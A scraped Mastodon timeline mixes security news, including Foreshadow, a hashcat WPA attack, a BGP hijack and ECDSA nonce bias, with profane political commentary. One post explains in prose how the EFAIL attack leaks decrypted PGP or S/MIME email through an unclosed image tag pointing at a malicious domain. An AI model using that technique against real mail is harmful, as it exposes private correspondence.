Pinned toot

On behalf of the community that has long been saying that is fundamentally incompatible with democracy and a graver national security threat than terrorism, I'd like to say:

We fucking told you so!

influence campaigns

family / culture wars

Your apathy is not an accident.

Make sure to today, everyone in the US 🇺🇸.

Hmm. Swedish kids are taught about on milk cartons, while the prevailing US dogma is that regular people are too stupid to understand security and security products/options have to be dumbed down enough to accommodate this unfixable reality. A self-fulfiilling prophesy of dumb.

Stop teaching kids outdated subjects like geography and instead teach computer security and programming in grade school as the essential life skills they are.

twitter.com/angealbertini/stat

krypteia boosted

Life + 70 years is already an overlong copyright term that suppresses creativity. Forcing it on other countries through trade agreements is a big mistake. eff.org/deeplinks/2018/10/new-

pfSense.org uses domain validation certs and doesn't provide pgp signatures for releases...cuz getting a fresh copy of from a naked internet connection after your firewall upgrade fails should be as sketchy a process as possible, apparently.

Thanks for the final impetus to move to for good.

krypteia boosted

Wait, what. introduces its own onion service and it doesn't look terribly bad:
blog.cloudflare.com/cloudflare

Also of note, HTTP Alternative Services now supported by the Tor Browser:
tools.ietf.org/html/rfc7838

krypteia boosted

Credit where credit is due: yesterday Intel released the Firmware Support Package (FSP) for Coffee Lake generation of CPUs on github. After a request to change the license so it is no issue to distribute for coreboot etc they (Vincent Zimmer & Nathan Desimone) did! This is great news!

Repos on Github: github.com/IntelFsp/FSP

Coreboot mailing list thread:
mail.coreboot.org/pipermail/co

I've been a big fan of the U2FZero, an open-source open-hardware U2F usb dongle for those that take "trust no one" seriously.

Anyway, looks like Conor Patrick (developer of the U2FZero) has finalized the design of the new generation key.

Looks like they're releasing it through a kickstarter campaign. I'd definitely wait until you can build and program your own, as the supply chain for these prebuilt devices will be anything but secure.

solokeys.com/

krypteia boosted

The #French can be a bit extreme with their reactions.

OK, a new #vulnerability has been found in #Intel's #CPU but naming a village #NoIntel to express their views is a bit too much. #Foreshadow

Speculative execution claims another scalp. Seems you can get into SGX (and basically read any L1 cache).

foreshadowattack.eu

With a President that leans heavily towards Hitler, he's worried about the guy that leans heavily towards FDR. What a fucking schmuck.

twitter.com/Comey/status/10211

krypteia boosted

RT @hashcat@birdsite.link
We've developed a new attack on WPA/WPA2. There's no more complete 4-way handshake recording required. Here's all details and tools you need: hashcat.net/forum/thread-7717.

twitter.com/hashcat/status/102

If you're feeling like our politics are hopelessly imbecile in the face of grave national threats, remember that Lincoln (a sitting president, during a Civil War) had to go before the Senate and personally testify that Mary Todd Lincoln wasn't a confederate spy.

This too shall pass.

krypteia boosted
krypteia boosted

Today's BGP hijack of Cloudflare's 1.1.1.1 DNS service to an AS in China demonstrates how using a centralized DNS service is dangerous.

Running a recursive resolver, preferably with DNSSEC validation and enforcement, should help mitigate issues like what happened this morning.

Catching up on news.

, , more , vulnerabilities... Everything is as terrible as I remember.

attack to decrypt and exfiltrate pgp or s/mime encrypted email is pretty hilarious.

Intercept an encrypted email and modify the email to add an HTML image URL directed to your malicious domain. Leave the image tag open (without closed quotes) and paste in the encrypted email and then close the image tag. Most clients will decrypt the text and query the malicious domain looking for an image matching the decrypted text.

This is why we encrypt and authenticate kids.

efail.de

Apparently declaring to be dead, just because your business model requires it, does not make it so.

Some things are only born posthumously.

krypteia boosted

RT @tqbf@birdsite.link
Presenting Cryptopals Set 8 challenge 6: KEY RECOVERY ON BIASED ECDSA NONCES. toadstyle.org/cryptopals/76f2e

Every DSA signature needs a random nonce, but not every DSA signature truly has one. With even a _bias_ in the nonce, a little linear algebra recovers keys.

twitter.com/tqbf/status/980141

Cryptocurrency hot take Show more

krypteia boosted

Masto meta; etiquette Show more

Show more
Mastodon

Follow friends and discover new ones. Publish anything you want: links, pictures, text, video. This server is run by the main developers of the Mastodon project. Everyone is welcome as long as you follow our code of conduct!